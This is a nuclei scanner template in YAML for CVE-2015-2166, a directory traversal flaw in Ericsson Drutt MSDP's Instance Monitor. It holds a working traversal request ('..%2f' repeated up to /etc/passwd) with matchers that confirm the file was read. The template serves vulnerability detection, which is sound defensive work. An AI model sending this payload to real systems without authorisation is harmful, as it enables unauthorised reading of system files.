nuclei-templates/cves/2015/CVE-2015-2166.yaml

28 lines
831 B
YAML
Raw Normal View History

2021-12-19 13:33:58 +00:00
id: CVE-2015-2166
info:
name: Ericsson Drutt MSDP (Instance Monitor) Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Instance Monitor in Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI.
2021-12-20 07:32:41 +00:00
reference:
- https://www.exploit-db.com/exploits/36619
- https://nvd.nist.gov/vuln/detail/CVE-2015-2166
2021-12-20 07:26:36 +00:00
tags: cve,cve2015,lfi,ericsson
2021-12-19 13:33:58 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
matchers-condition: and
matchers:
- type: regex
2021-12-20 07:26:36 +00:00
part: body
2021-12-19 13:33:58 +00:00
regex:
- "root:.*:0:0:"
2021-12-19 13:33:58 +00:00
- type: status
status:
- 200